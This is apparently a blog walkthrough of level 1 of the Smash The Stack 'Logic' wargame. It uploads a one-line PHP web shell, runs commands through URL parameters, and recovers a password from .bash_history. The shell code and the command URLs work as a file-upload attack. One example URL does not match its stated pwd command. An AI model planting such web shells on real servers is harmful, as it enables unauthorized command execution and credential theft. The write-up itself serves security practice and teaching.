Welcome back to Technolution! Today we’re going to be starting the Logic wargame, hosted on the Smash The Stack network. As always, passwords will be stripped and replaced with Y’s. So without further adieu, let’s get started.
Starting Logic, we should visit it’s main page. This page links us to level1 which is running as a website hosted on the wargame server. This website takes a file and uploads it to a directory called “uploads”. Well, since the uploads directory sounds like it’s within the http directory, let’s make the assumption that we can execute php files in there since the upload file is a php file itself. Thus, let’s create a php file which, when we visit it, will let us execute commands on the webserver. Let’s use the following today:
<?php
echo system($_GET[“h”]);
?>
Before discussing this file, I’d like to take a moment to discuss the choice of using a php file with a system() call. There are many options one could take when allowed to upload a file, however, I feel this is the most reliable. We know we’re running on a web server, that php is enabled, and that web traffic is allowed through any firewall rules. This makes php with system() call access via HTTP a strong vector of attack. Another option would be to upload a binary of something such as netcat, or try and call netcat, ssh, or various other programs through your uploaded file. While this is an option, there may be things (such as firewall rules, already bound ports, etc) which may make these vectors less reliable. Thus, in this example, we’ll continue on with our simple php system() call file.
As stated, this file simply takes a parameter called “h” via the URL supplied GET parameters and sends it as a command to the system() call function. It then prints the output of the command. Go a head and save that as a php file and upload it onto the webserver. Then, go to the uploads directory and access the file you just uploaded (we’ll be using s9.php as our filename in this example). To test it, let’s check the current directory with the print working directory command (pwd). To do this, vistit the page and pass this command as the value for the “h” parameter:
http://logic.smashthestack.org:8181/uploads/s9.php?h=more%20/home/level1/.bash_history
/srv/www/level1/uploads /srv/www/level1/uploads
Great, it works! A couple things to note, we get an extra repeat of the last output as the system command flushes the output buffer in php (hence the repeat at the end). Also, there isn’t a line break (since we’re viewing in a web browser which requires the html <br> tags or similar). To make line breaks show, try viewing the page’s source!
Next, let’s check what user the web server is running as with the “id” command:
http://logic.smashthestack.org:8181/uploads/s9.php?h=id
uid=601(level1) gid=601(level1) groups=601(level1),615(nosu) uid=601(level1) gid=601(level1) groups=601(level1),615(nosu)
Great, we’re running as level1. Let’s go a head and check out level1’s home directory:
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=ls%20-la%20/home/level1
total 52
drwxr-xr-x 2 level1 level1 4096 Oct 16 2010 .
drwx–x–x 21 root root 4096 Aug 9 2010 ..
-rw-r–r– 1 root level1 43 Sep 19 2010 .bash_history
-rwxr-x— 1 root level1 1708 Feb 5 2010 .bash_profile
-r–r–r– 1 level1 level1 246 Oct 16 2010 README
-rw-r–r– 1 level1 level1 32304 Oct 13 13:23 tags
-rw-r–r– 1 level1 level1 32304 Oct 13 13:23 tags
Let’s go and check out the README, see if we can figure out more information about the system:
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=more%20/home/level1/README
::::::::::::::
/home/level1/README
::::::::::::::
Congrats on getting to the shell. Now you must find the password for level2.
Once you have found the password you can reconnect to the server as the
level2 user:ssh -p 2227 logic.smashthestack.org -l level2
You need not look far from home.
You need not look far from home.
Already congratulating us on shell access, well I guess we kind of have shell access! Hmm, I wonder what this “you need not look far from home” stuff is about. If we get a directory listing of /home/level2 we can find a .pass file, however we don’t have permissions to read it!
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=ls%20-la%20/home/level2
total 24
drwxr-xr-x 2 level2 level2 4096 Apr 26 2010 .
drwx–x–x 21 root root 4096 Aug 9 2010 ..
-rwxr-x— 1 root level2 1708 Feb 5 2010 .bash_profile
-r——– 1 level2 level2 9 Apr 26 2010 .pass
-rw-r–r– 1 level2 level2 7253 Oct 13 14:36 tags
-rw-r–r– 1 level2 level2 7253 Oct 13 14:36 tags
So, looking back at level1, and knowing we haven’t found the password and that we haven’t logged into the shell, and we haven’t caused any changes to .bash_history, let’s look at the contents of the bash history to see what was last done in September of 2010 (two years ago at the point of writing).
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=more%20/home/level1/.bash_history
::::::::::::::
/home/level1/.bash_history
::::::::::::::
ls
who
cat README
YYYYYYYY
clear
su level2
su level2
Well that’s somewhat interesting. Noticing that .pass of level2 is 9 bytes, including EOF marker, which would make for an 8 byte password, I wonder if that’s just coincidence for the 8 character string in bash_history before someone switched users to level2. To check, we can try to ssh into level2 and check that string as the password:
login as: level2
Problems connecting? Visit us on IRC at irc.smashthestack.org
(port +6697) in channel #logic. Or email mh@smashthestack.org
Level1 is not accessed via SSH. Please find it online at:
http://logic.smashthestack.org:8181/index.htmllevel2@logic.smashthestack.org’s password:
[level2@logic ~]$
Tada! There we have it, level1 of logic complete! So, what’s the lesson here? Don’t trust users? Don’t let users upload arbitrary files? Don’t let users upload files to a place where they can be executed? Maybe all of the above. Also, if you happen to reveal important things, such as passwords (practical example would be mysqldump or other commands that take a password as a command line argument in plain text), remember that this information is saved in (and should be cleared from) logs such as .bash_history!